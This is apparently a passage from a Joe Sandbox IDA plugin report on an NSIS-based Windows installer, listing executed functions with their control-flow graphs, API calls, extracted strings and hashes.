406009 lstrcpynW 4106->4116 4108->4107 4118 406009 lstrcpynW 4110->4118 4111 401f06 4117 406009 lstrcpynW 4111->4117 4112->4102 4114 401f15 4119 406009 lstrcpynW 4114->4119 4116->4111 4117->4114 4118->4104 4119->4107 5200 4074bb 5202 407344 5200->5202 5201 407c6d 5202->5201 5203 4073c2 GlobalFree 5202->5203 5204 4073cb GlobalAlloc 5202->5204 5205 407443 GlobalAlloc 5202->5205 5206 40743a GlobalFree 5202->5206 5203->5204 5204->5201 5204->5202 5205->5201 5205->5202 5206->5205

                                                                                        Executed Functions

                                                                                        Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304filestringcomCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 146 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 153 403923-403937 call 405d06 CharNextW 146->153 154 40391b-40391e 146->154 157 4039ca-4039d0 153->157 154->153 158 4039d6 157->158 159 40393c-403942 157->159 160 4039f5-403a0d GetTempPathW call 4037cc 158->160 161 403944-40394a 159->161 162 40394c-403950 159->162 169 403a33-403a4d DeleteFileW call 403587 160->169 170 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 160->170 161->161 161->162 164 403952-403957 162->164 165 403958-40395c 162->165 164->165 167 4039b8-4039c5 call 405d06 165->167 168 40395e-403965 165->168 167->157 183 4039c7 167->183 172 403967-40396e 168->172 173 40397a-40398c call 403800 168->173 186 403acc-403adb call 403859 OleUninitialize 169->186 187 403a4f-403a55 169->187 170->169 170->186 174 403970-403973 172->174 175 403975 172->175 184 4039a1-4039b6 call 403800 173->184 185 40398e-403995 173->185 174->173 174->175 175->173 183->157 184->167 202 4039d8-4039f0 call 407d6e call 406009 184->202 189 403997-40399a 185->189 190 40399c 185->190 200 403ae1-403af1 call 405ca0 ExitProcess 186->200 201 403bce-403bd4 186->201 192 403ab5-403abc call 40592c 187->192 193 403a57-403a60 call 405d06 187->193 189->184 189->190 190->184 199 403ac1-403ac7 call 4060e7 192->199 203 403a79-403a7b 193->203 199->186 206 403c51-403c59 201->206 207 403bd6-403bf3 call 4062fc * 3 201->207 202->160 211 403a62-403a74 call 403800 203->211 212 403a7d-403a87 203->212 213 403c5b 206->213 214 403c5f 206->214 238 403bf5-403bf7 207->238 239 403c3d-403c48 ExitWindowsEx 207->239 211->212 225 403a76 211->225 219 403af7-403b11 lstrcatW lstrcmpiW 212->219 220 403a89-403a99 call 40677e 212->220 213->214 219->186 224 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 219->224 220->186 231 403a9b-403ab1 call 406009 * 2 220->231 228 403b36-403b56 call 406009 * 2 224->228 229 403b2b-403b31 call 406009 224->229 225->203 245 403b5b-403b77 call 406805 DeleteFileW 228->245 229->228 231->192 238->239 243 403bf9-403bfb 238->243 239->206 242 403c4a-403c4c call 40141d 239->242 242->206 243->239 247 403bfd-403c0f GetCurrentProcess 243->247 253 403bb8-403bc0 245->253 254 403b79-403b89 CopyFileW 245->254 247->239 252 403c11-403c33 247->252 252->239 253->245 255 403bc2-403bc9 call 406c68 253->255 254->253 256 403b8b-403bab call 406c68 call 406805 call 405c3f 254->256 255->186 256->253 266 403bad-403bb4 CloseHandle 256->266 266->253
                                                                                        APIs
                                                                                        • #17.COMCTL32 ref: 004038A2
                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                                        • OleUninitialize.OLE32(?), ref: 00403AD1
                                                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                                        • API String ID: 2435955865-239407132
                                                                                        • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                                        • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E
                                                                                        Function 004074BB Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 646 4074bb-4074c0 647 4074c2-4074ef 646->647 648 40752f-407547 646->648 650 4074f1-4074f4 647->650 651 4074f6-4074fa 647->651 649 407aeb-407aff 648->649 655 407b01-407b17 649->655 656 407b19-407b2c 649->656 652 407506-407509 650->652 653 407502 651->653 654 4074fc-407500 651->654 657 407527-40752a 652->657 658 40750b-407514 652->658 653->652 654->652 659 407b33-407b3a 655->659 656->659 662 4076f6-407713 657->662 663 407516 658->663 664 407519-407525 658->664 660 407b61-407c68 659->660 661 407b3c-407b40 659->661 677 407350 660->677 678 407cec 660->678 666 407b46-407b5e 661->666 667 407ccd-407cd4 661->667 669 407715-407729 662->669 670 40772b-40773e 662->670 663->664 665 407589-4075b6 664->665 673 4075d2-4075ec 665->673 674 4075b8-4075d0 665->674 666->660 671 407cdd-407cea 667->671 675 407741-40774b 669->675 670->675 676 407cef-407cf6 671->676 679 4075f0-4075fa 673->679 674->679 680 40774d 675->680 681 4076ee-4076f4 675->681 682 407357-40735b 677->682 683 40749b-4074b6 677->683 684 40746d-407471 677->684 685 4073ff-407403 677->685 678->676 688 407600 679->688 689 407571-407577 679->689 690 407845-4078a1 680->690 691 4076c9-4076cd 680->691 681->662 687 407692-40769c 681->687 682->671 692 407361-40736e 682->692 683->649 697 407c76-407c7d 684->697 698 407477-40748b 684->698 703 407409-407420 685->703 704 407c6d-407c74 685->704 693 4076a2-4076c4 687->693 694 407c9a-407ca1 687->694 706 407556-40756e 688->706 707 407c7f-407c86 688->707 695 40762a-407630 689->695 696 40757d-407583 689->696 690->649 699 407c91-407c98 691->699 700 4076d3-4076eb 691->700 692->678 708 407374-4073ba 692->708 693->690 694->671 709 40768e 695->709 710 407632-40764f 695->710 696->665 696->709 697->671 705 40748e-407496 698->705 699->671 700->681 711 407423-407427 703->711 704->671 705->684 715 407498 705->715 706->689 707->671 713 4073e2-4073e4 708->713 714 4073bc-4073c0 708->714 709->687 716 407651-407665 710->716 717 407667-40767a 710->717 711->685 712 407429-40742f 711->712 719 407431-407438 712->719 720 407459-40746b 712->720 723 4073f5-4073fd 713->723 724 4073e6-4073f3 713->724 721 4073c2-4073c5 GlobalFree 714->721 722 4073cb-4073d9 GlobalAlloc 714->722 715->683 718 40767d-407687 716->718 717->718 718->695 725 407689 718->725 726 407443-407453 GlobalAlloc 719->726 727 40743a-40743d GlobalFree 719->727 720->705 721->722 722->678 728 4073df 722->728 723->711 724->723 724->724 730 407c88-407c8f 725->730 731 40760f-407627 725->731 726->678 726->720 727->726 728->713 730->671 731->695
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                                        Function 004062FC Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                        • String ID:
                                                                                        • API String ID: 310444273-0
                                                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                                        Function 004062D5 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                                        Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 4015a0-4015f4 1 4030e3-4030ec 0->1 2 4015fa 0->2 26 4030ee-4030f2 1->26 4 401601-401611 call 4062a3 2->4 5 401742-40174f 2->5 6 401962-40197d call 40145c GetFullPathNameW 2->6 7 4019ca-4019e6 call 40145c SearchPathW 2->7 8 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 2->8 9 401650-401668 call 40137e call 4062a3 call 40139d 2->9 10 4017b1-4017d8 call 40145c call 4062a3 call 405d59 2->10 11 401672-401686 call 40145c call 4062a3 2->11 12 401693-4016ac call 401446 call 4062a3 2->12 13 401715-401731 2->13 14 401616-40162d call 40145c call 4062a3 call 404f72 2->14 15 4016d6-4016db 2->15 16 401736-4030de 2->16 17 401897-4018a7 call 40145c call 4062d5 2->17 18 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 2->18 19 40163c-401645 2->19 20 4016bd-4016d1 call 4062a3 SetForegroundWindow 2->20 4->26 30 401751-401755 ShowWindow 5->30 31 401758-40175f 5->31 65 4019a3-4019a8 6->65 66 40197f-401984 6->66 7->1 58 4019ec-4019f8 7->58 8->1 83 40179a-4017a6 call 4062a3 8->83 92 40166d 9->92 105 401864-40186c 10->105 106 4017de-4017fc call 405d06 CreateDirectoryW 10->106 84 401689-40168e call 404f72 11->84 89 4016b1-4016b8 Sleep 12->89 90 4016ae-4016b0 12->90 13->26 27 401632-401637 14->27 24 401702-401710 15->24 25 4016dd-4016fd call 401446 15->25 16->1 60 4030de call 405f51 16->60 85 4018c2-4018d6 call 4062a3 17->85 86 4018a9-4018bd call 4062a3 17->86 113 401912-401919 18->113 114 40191e-401921 18->114 19->27 28 401647-40164e PostQuitMessage 19->28 20->1 24->1 25->1 27->26 28->27 30->31 31->1 49 401765-401769 ShowWindow 31->49 49->1 58->1 60->1 69 4019af-4019b2 65->69 66->69 76 401986-401989 66->76 69->1 79 4019b8-4019c5 GetShortPathNameW 69->79 76->69 87 40198b-401993 call 4062d5 76->87 79->1 100 4017ab-4017ac 83->100 84->1 85->26 86->26 87->65 110 401995-4019a1 call 406009 87->110 89->1 90->89 92->26 100->1 108 401890-401892 105->108 109 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 105->109 118 401846-40184e call 4062a3 106->118 119 4017fe-401809 GetLastError 106->119 108->84 109->1 110->69 113->84 120 401923-40192b call 4062d5 114->120 121 40194a-401950 114->121 133 401853-401854 118->133 124 401827-401832 GetFileAttributesW 119->124 125 40180b-401825 GetLastError call 4062a3 119->125 120->121 139 40192d-401948 call 406c68 call 404f72 120->139 129 401957-40195d call 4062a3 121->129 131 401834-401844 call 4062a3 124->131 132 401855-40185e 124->132 125->132 129->100 131->133 132->105 132->106 133->132 139->129
                                                                                        APIs
                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                        • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                        Strings
                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                        • Jump: %d, xrefs: 00401602
                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                        • BringToFront, xrefs: 004016BD
                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                        • Call: %d, xrefs: 0040165A
                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                        • API String ID: 2872004960-3619442763
                                                                                        • Opcode ID: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                        • Opcode Fuzzy Hash: 2a82ad59b9370b3cc3d5141fac41001cfacad1d5dd7d37275e8bf63d0114621f
                                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                        Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 267 40592c-405944 call 4062fc 270 405946-405956 call 405f51 267->270 271 405958-405990 call 405ed3 267->271 279 4059b3-4059dc call 403e95 call 40677e 270->279 276 405992-4059a3 call 405ed3 271->276 277 4059a8-4059ae lstrcatW 271->277 276->277 277->279 285 405a70-405a78 call 40677e 279->285 286 4059e2-4059e7 279->286 292 405a86-405a8d 285->292 293 405a7a-405a81 call 406805 285->293 286->285 287 4059ed-405a15 call 405ed3 286->287 287->285 294 405a17-405a1b 287->294 296 405aa6-405acb LoadImageW 292->296 297 405a8f-405a95 292->297 293->292 301 405a1d-405a2c call 405d06 294->301 302 405a2f-405a3b lstrlenW 294->302 299 405ad1-405b13 RegisterClassW 296->299 300 405b66-405b6e call 40141d 296->300 297->296 298 405a97-405a9c call 403e74 297->298 298->296 306 405c35 299->306 307 405b19-405b61 SystemParametersInfoW CreateWindowExW 299->307 319 405b70-405b73 300->319 320 405b78-405b83 call 403e95 300->320 301->302 303 405a63-405a6b call 406722 call 406009 302->303 304 405a3d-405a4b lstrcmpiW 302->304 303->285 304->303 311 405a4d-405a57 GetFileAttributesW 304->311 310 405c37-405c3e 306->310 307->300 316 405a59-405a5b 311->316 317 405a5d-405a5e call 406751 311->317 316->303 316->317 317->303 319->310 325 405b89-405ba6 ShowWindow LoadLibraryW 320->325 326 405c0c-405c14 call 405047 320->326 328 405ba8-405bad LoadLibraryW 325->328 329 405baf-405bc1 GetClassInfoW 325->329 334 405c16-405c1c 326->334 335 405c2e-405c30 call 40141d 326->335 328->329 330 405bc3-405bd3 GetClassInfoW RegisterClassW 329->330 331 405bd9-405c0a DialogBoxParamW call 40141d call 403c68 329->331 330->331 331->310 334->319 337 405c22-405c29 call 40141d 334->337 335->306 337->319
                                                                                        APIs
                                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                        • lstrcatW.KERNEL32(004D30C0,00447240), ref: 004059AE
                                                                                        • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                        • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                        • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                        • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                          • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                        • LoadLibraryW.KERNEL32(RichEd20), ref: 00405BA2
                                                                                        • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                        • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                        • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                        • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2013900805.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2013881663.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013929653.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2013958935.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2014062176.00000000004FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
